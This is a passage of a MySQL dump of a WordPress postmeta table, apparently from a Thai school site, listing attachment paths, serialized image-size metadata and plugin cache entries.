(14193, 6081, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575569947;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6332;}i:1;a:1:{s:2:\"id\";i:6071;}i:2;a:1:{s:2:\"id\";i:6074;}}}}'),
(14194, 6074, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575576109;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5141;}i:1;a:1:{s:2:\"id\";i:6078;}i:2;a:1:{s:2:\"id\";i:6063;}}}}'),
(14195, 6078, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575656408;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5957;}i:1;a:1:{s:2:\"id\";i:5197;}i:2;a:1:{s:2:\"id\";i:5604;}}}}'),
(14196, 6089, '_edit_lock', '1569230957:14'),
(14197, 6089, '_edit_last', '14'),
(14198, 6090, '_wp_attached_file', '2019/08/คำสั่งเวรเดือน-ก.ย.62.pdf'),
(14202, 6089, '_hide_featured', NULL),
(14203, 6089, '_yoast_wpseo_content_score', '60'),
(14204, 6089, '_yoast_wpseo_primary_category', '3'),
(14205, 6089, '_wpas_done_all', '1'),
(14208, 6089, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575581487;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6008;}i:1;a:1:{s:2:\"id\";i:5906;}i:2;a:1:{s:2:\"id\";i:6259;}}}}'),
(14212, 6092, '_wp_attached_file', '2018/01/2-11-2561-13-38-39.jpg'),
(14213, 6092, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:237;s:6:\"height\";i:300;s:4:\"file\";s:30:\"2018/01/2-11-2561-13-38-39.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-38-39-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-38-39-237x300.jpg\";s:5:\"width\";i:237;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"2-11-2561-13-38-39-237x300.jpg\";s:5:\"width\";i:237;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14234, 6098, '_wp_attached_file', '2019/09/วิธีการเข้าระบบ-V-Cop.pdf'),
(14235, 6099, '_wp_attached_file', '2019/09/วิธีการเข้าระบบ-V-Cop-1.pdf'),
(14238, 6101, '_wp_attached_file', '2019/09/วิธีการเข้าระบบ-V-Cop-2.pdf'),
(14266, 6112, '_wp_attached_file', '2019/09/วิธีการเข้าระบบ-V-Cop-3.pdf'),
(14271, 6115, '_edit_lock', '1568713344:14'),
(14272, 6115, '_edit_last', '14'),
(14273, 6116, '_wp_attached_file', '2019/09/ประกาศลงทะเบียน2-62.pdf'),
(14277, 6115, '_hide_featured', NULL),
(14278, 6115, '_yoast_wpseo_content_score', '60'),
(14279, 6115, '_yoast_wpseo_primary_category', '3'),
(14280, 6115, '_wpas_done_all', '1'),
(14287, 6115, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575740570;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5469;}i:1;a:1:{s:2:\"id\";i:4093;}i:2;a:1:{s:2:\"id\";i:4020;}}}}'),
(14288, 6119, '_edit_lock', '1568782693:14'),
(14289, 6119, '_edit_last', '14'),
(14290, 6120, '_wp_attached_file', '2019/09/180962-01.jpg'),
(14291, 6120, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-01-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-01-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-01-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-01-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14292, 6121, '_wp_attached_file', '2019/09/180962-14.jpg'),
(14293, 6121, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-14.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-14-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-14-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-14-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-14-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14294, 6122, '_wp_attached_file', '2019/09/180962-11.jpg'),
(14295, 6122, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-11.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-11-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-11-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-11-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-11-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14296, 6123, '_wp_attached_file', '2019/09/180962-10.jpg'),
(14297, 6123, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-10.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-10-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-10-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-10-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-10-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14298, 6124, '_wp_attached_file', '2019/09/180962-09.jpg'),
(14299, 6124, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-09.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-09-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-09-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-09-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-09-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14300, 6125, '_wp_attached_file', '2019/09/180962-08.jpg'),
(14301, 6125, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-08.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-08-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-08-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-08-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-08-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14302, 6126, '_wp_attached_file', '2019/09/180962-07.jpg'),
(14303, 6126, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-07.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-07-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-07-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-07-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-07-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14304, 6127, '_wp_attached_file', '2019/09/180962-06.jpg'),
(14305, 6127, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-06.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-06-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-06-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-06-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-06-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14306, 6128, '_wp_attached_file', '2019/09/180962-05.jpg'),
(14307, 6128, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-05-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-05-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-05-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-05-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14308, 6129, '_wp_attached_file', '2019/09/180962-03.jpg'),
(14309, 6129, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-03-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-03-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-03-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-03-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14310, 6130, '_wp_attached_file', '2019/09/180962-13.jpg'),
(14311, 6130, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-13.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-13-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-13-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-13-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-13-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14312, 6131, '_wp_attached_file', '2019/09/180962-04.jpg'),
(14313, 6131, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-04-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-04-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-04-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-04-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14314, 6132, '_wp_attached_file', '2019/09/180962-12.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(14315, 6132, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-12.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-12-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-12-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-12-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-12-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14316, 6133, '_wp_attached_file', '2019/09/180962-02.jpg'),
(14317, 6133, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/09/180962-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"180962-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"180962-02-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"180962-02-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"180962-02-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"180962-02-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14318, 6134, '_wp_attached_file', '2019/09/180962-01-1.jpg'),
